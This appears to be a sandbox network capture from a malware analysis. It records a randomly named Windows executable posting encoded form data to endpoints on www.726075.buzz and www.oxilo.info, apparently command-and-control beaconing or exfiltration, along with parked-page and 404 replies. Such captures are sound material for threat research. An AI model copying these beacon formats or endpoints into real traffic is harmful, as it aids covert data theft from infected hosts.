Oct 9, 2024 16:30:15.690278053 CEST	1236	IN	HTTP/1.1 200 OK Server: hcdn Date: Wed, 09 Oct 2024 14:30:15 GMT Content-Type: text/html Content-Length: 10072 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 749cf807da45d68af671fb8e5355ead7-bos-edge4 Expires: Wed, 09 Oct 2024 14:30:14 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
Oct 9, 2024 16:30:15.690313101 CEST	1236	IN	Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
Oct 9, 2024 16:30:15.690330982 CEST	1236	IN	Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
Oct 9, 2024 16:30:15.690346956 CEST	672	IN	Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
Oct 9, 2024 16:30:15.690361977 CEST	1236	IN	Data Raw: 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 Data Ascii: sync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer\|\|[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32
Oct 9, 2024 16:30:15.690376997 CEST	1236	IN	Data Raw: 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 65 6d 70 74 79 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 Data Ascii: ogin</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</di
Oct 9, 2024 16:30:15.690392971 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 35 38 33 32 31 34 2d 68 6f 77 2d 74 6f 2d 61 64 64 2d 61 2d 64 6f 6d 61 69 6e 2d 74 6f 2d 6d 79 2d 61 63 63 6f 75 6e 74 2d 68 6f 77 2d 74 6f 2d Data Ascii: upport.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change
Oct 9, 2024 16:30:15.690407991 CEST	1236	IN	Data Raw: 68 2e 66 6c 6f 6f 72 28 72 2f 37 30 30 29 3a 72 3e 3e 31 2c 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 65 29 2c 74 3d 30 3b 34 35 35 3c 72 3b 74 2b 3d 6f 29 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 33 35 29 3b 72 65 74 75 72 6e 20 4d 61 Data Ascii: h.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c
Oct 9, 2024 16:30:15.690424919 CEST	1088	IN	Data Raw: 5d 3d 74 5b 64 5d 21 3d 77 5b 64 5d 3b 76 61 72 20 6d 2c 79 3d 5b 5d 3b 66 6f 72 28 68 3d 31 32 38 2c 75 3d 37 32 2c 64 3d 66 3d 30 3b 64 3c 76 3b 2b 2b 64 29 74 5b 64 5d 3c 31 32 38 26 26 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 Data Ascii: ]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50003	47.57.185.227	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:20.759464979 CEST	759	OUT	POST /nuiv/ HTTP/1.1 Host: www.726075.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.726075.buzz Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.726075.buzz/nuiv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 32 75 47 62 6e 47 4c 4e 61 4b 61 50 51 71 6e 65 47 32 53 44 6d 64 43 2f 4f 62 67 72 32 48 32 65 6f 4b 76 2f 46 55 68 72 67 35 4f 59 6e 52 53 68 36 33 74 61 6e 56 30 45 59 78 5a 6c 46 48 65 75 4e 36 30 73 71 43 32 51 56 37 6e 30 66 56 72 35 34 77 39 49 41 42 6d 68 66 6d 32 6a 30 52 4e 34 2f 54 43 52 71 32 67 57 59 76 55 6f 59 4c 77 31 66 55 51 55 41 79 43 6d 74 38 4e 36 50 32 33 71 6c 4a 47 6d 46 36 6f 52 56 52 63 36 2f 44 37 61 35 79 50 6e 46 2b 74 2b 76 5a 6b 61 5a 41 38 69 64 38 2f 39 59 64 30 4c 35 54 56 55 75 76 36 79 52 64 61 74 52 31 44 42 43 71 59 75 31 42 33 78 39 58 2b 56 79 4c 73 3d Data Ascii: 1Dd0AZ=2uGbnGLNaKaPQqneG2SDmdC/Obgr2H2eoKv/FUhrg5OYnRSh63tanV0EYxZlFHeuN60sqC2QV7n0fVr54w9IABmhfm2j0RN4/TCRq2gWYvUoYLw1fUQUAyCmt8N6P23qlJGmF6oRVRc6/D7a5yPnF+t+vZkaZA8id8/9Yd0L5TVUuv6yRdatR1DBCqYu1B3x9X+VyLs=
Oct 9, 2024 16:30:21.681909084 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:30:21 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50004	47.57.185.227	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:23.310446978 CEST	779	OUT	POST /nuiv/ HTTP/1.1 Host: www.726075.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.726075.buzz Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.726075.buzz/nuiv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 32 75 47 62 6e 47 4c 4e 61 4b 61 50 51 4b 33 65 4b 78 47 44 67 39 43 38 4c 62 67 72 38 6e 32 61 6f 4b 6a 2f 46 57 4d 67 6e 4c 61 59 6e 77 43 68 37 31 46 61 6b 56 30 45 41 68 5a 67 42 48 65 6c 4e 36 6f 4f 71 48 4f 51 56 37 44 30 66 51 58 35 37 44 46 4a 43 52 6d 76 51 47 32 6c 77 52 4e 34 2f 54 43 52 71 32 6b 73 59 76 4d 6f 62 2b 34 31 4e 68 73 58 49 53 43 68 39 63 4e 36 4c 32 33 75 6c 4a 47 49 46 2b 78 32 56 58 59 36 2f 47 2f 61 34 6a 50 6b 66 75 74 6b 77 70 6c 32 51 67 70 75 63 2f 4b 74 53 72 6c 33 6e 51 74 4b 76 5a 58 59 4c 2f 53 46 43 56 76 35 53 35 51 5a 6b 78 57 59 6e 30 75 6c 73 63 34 37 35 57 63 6c 2b 65 30 4f 5a 41 6e 50 32 70 2f 63 46 33 79 4a Data Ascii: 1Dd0AZ=2uGbnGLNaKaPQK3eKxGDg9C8Lbgr8n2aoKj/FWMgnLaYnwCh71FakV0EAhZgBHelN6oOqHOQV7D0fQX57DFJCRmvQG2lwRN4/TCRq2ksYvMob+41NhsXISCh9cN6L23ulJGIF+x2VXY6/G/a4jPkfutkwpl2Qgpuc/KtSrl3nQtKvZXYL/SFCVv5S5QZkxWYn0ulsc475Wcl+e0OZAnP2p/cF3yJ
Oct 9, 2024 16:30:24.210056067 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:30:24 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50005	47.57.185.227	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:25.859383106 CEST	1796	OUT	POST /nuiv/ HTTP/1.1 Host: www.726075.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.726075.buzz Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.726075.buzz/nuiv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 32 75 47 62 6e 47 4c 4e 61 4b 61 50 51 4b 33 65 4b 78 47 44 67 39 43 38 4c 62 67 72 38 6e 32 61 6f 4b 6a 2f 46 57 4d 67 6e 4c 69 59 6e 6e 43 68 36 55 46 61 6c 56 30 45 49 42 5a 68 42 48 65 34 4e 36 67 4b 71 48 53 75 56 35 72 30 64 79 76 35 36 79 46 4a 49 52 6d 76 53 47 32 6b 30 52 4d 36 2f 54 53 56 71 31 4d 73 59 76 4d 6f 62 2f 49 31 50 30 51 58 4f 53 43 6d 74 38 4e 4d 50 32 33 57 6c 4e 6a 31 46 2b 39 4d 56 47 6b 36 2f 6d 50 61 36 52 58 6b 55 75 74 36 7a 70 6c 75 51 67 30 73 63 2f 48 42 53 72 35 4a 6e 51 56 4b 76 75 75 59 4f 4d 71 6a 41 46 33 6a 51 4c 51 62 6b 33 47 6d 75 48 43 6f 73 65 77 6b 30 6b 77 31 35 4b 4e 4c 63 51 2b 46 72 50 7a 6f 4c 43 66 38 59 53 36 78 58 71 45 4c 35 43 69 64 38 77 31 4b 4d 67 51 53 6c 34 62 4d 38 31 32 62 41 41 6d 71 70 2f 78 6e 49 78 39 54 6c 5a 72 34 46 46 5a 30 6f 4f 30 34 73 5a 52 33 67 59 79 4e 72 67 47 34 62 30 6d 55 71 6b 76 38 58 31 6e 4e 4c 34 49 6b 4c 74 5a 41 64 51 44 50 6d 6d 36 6e 32 76 2f 66 52 70 56 53 33 6e 76 42 76 68 4f 54 6f 71 75 [TRUNCATED] Data Ascii: 1Dd0AZ=2uGbnGLNaKaPQK3eKxGDg9C8Lbgr8n2aoKj/FWMgnLiYnnCh6UFalV0EIBZhBHe4N6gKqHSuV5r0dyv56yFJIRmvSG2k0RM6/TSVq1MsYvMob/I1P0QXOSCmt8NMP23WlNj1F+9MVGk6/mPa6RXkUut6zpluQg0sc/HBSr5JnQVKvuuYOMqjAF3jQLQbk3GmuHCosewk0kw15KNLcQ+FrPzoLCf8YS6xXqEL5Cid8w1KMgQSl4bM812bAAmqp/xnIx9TlZr4FFZ0oO04sZR3gYyNrgG4b0mUqkv8X1nNL4IkLtZAdQDPmm6n2v/fRpVS3nvBvhOToqu4JK5frZkFsxEp9xD1/jRTD7AzRVyIoPwahauShF4j5n7D/NdEVo5q/wPNFMsMEP7Mep2zLYc6k/x4aUSNFCwpnOrUYRq1WvHlwpb2UFu4ZAxDV/IfP+us/RWBZyjUR3TP903Ysf56IeXkS9cTbQ8ObeN5zR/lrLuZzkAIejW3OD3NTzCfQDtlkMHlDP6NUWuqRdHExJtQD/39JIOS5h73mECF0pLZPj+jfl2HTvW4uo6mzL8nTwdxf/NYf0oAtOSFCjwKZXiv3acoWDqOzaJUXAbMnWh5EUpihpEtFqY0oLAJcXxKKBX891AbrfKc8hxI0aunR1W5v/9BOM74rIIfnYi8fq7cE1aiDaFjEa5KblWFjtPSWki6dm6KLuRWL9gPsFkcFSfVd5GW8dZhDdHTWqRvMrArBtCeFJpzqLaRLGH1jHMoaYdD+zKCHMsjqYFVOfRcaKwJ4g+9DixutGd3CyujBS+1+jy0ICZmMHTM2WcnNyCyWDEE+dobXEoCR4U/1Cci36gxX5+tYmiEdqLHDGS76Tf8br+i2YkGDn96nN/YM0CEunhvXy7E/MGGLrJqnGXMrRBwywcGAsajC04v1PfbF0vC1gJ0XqC5CvmWXuiYit6iK/+ar3sfioYjI4lXc6owGQJr3TxLTTaDbCb0ZPV2geSz1J3Ai [TRUNCATED]
Oct 9, 2024 16:30:27.050699949 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:30:26 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Oct 9, 2024 16:30:27.053740978 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:30:26 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50006	47.57.185.227	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:28.399941921 CEST	501	OUT	GET /nuiv/?1Dd0AZ=7su7kyuPS/KHUrSSGVu7suWxHYkjtEW9rejMc2pMopiQn27w9XMUnUBYAhg6Q3mcdodvpFC3LruuFA+cjx07AQKAGEKtxlRAoiigrCUyFvQ0T941BBkKKAOmk/5sJmea3Q==&-n1P=0hFdS6 HTTP/1.1 Host: www.726075.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:30:29.292896032 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:30:29 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50007	162.0.213.94	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:43.297208071 CEST	756	OUT	POST /ve3g/ HTTP/1.1 Host: www.oxilo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.oxilo.info Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.oxilo.info/ve3g/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 44 52 30 75 73 4b 77 41 63 30 33 47 35 74 76 72 4e 46 76 70 53 51 32 64 69 30 49 6c 67 42 62 78 41 47 49 56 4d 57 38 45 77 68 4c 71 6b 2f 6f 47 7a 48 71 34 69 74 48 61 75 4b 51 73 4c 55 35 75 42 55 79 47 47 6f 78 55 43 53 37 33 5a 41 72 48 6b 31 4a 64 61 47 38 36 6b 35 7a 59 57 31 78 79 5a 75 55 39 2b 70 4f 6f 4b 43 44 36 30 74 4b 58 4b 39 55 41 6c 4c 51 78 46 45 5a 4c 46 38 4a 75 52 74 6a 58 49 66 4c 72 47 6d 32 37 57 5a 44 58 64 61 38 4c 6a 55 65 48 46 48 49 44 6e 57 2b 53 6b 68 45 35 59 4d 59 61 2f 74 70 55 77 41 2f 34 7a 42 6e 47 6f 61 5a 68 78 4c 56 41 33 55 2b 50 75 6a 6c 47 75 73 77 3d Data Ascii: 1Dd0AZ=DR0usKwAc03G5tvrNFvpSQ2di0IlgBbxAGIVMW8EwhLqk/oGzHq4itHauKQsLU5uBUyGGoxUCS73ZArHk1JdaG86k5zYW1xyZuU9+pOoKCD60tKXK9UAlLQxFEZLF8JuRtjXIfLrGm27WZDXda8LjUeHFHIDnW+SkhE5YMYa/tpUwA/4zBnGoaZhxLVA3U+PujlGusw=
Oct 9, 2024 16:30:43.889381886 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 09 Oct 2024 14:30:43 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 16052 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Oct 9, 2024 16:30:43.889413118 CEST	224	IN	Data Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transfo
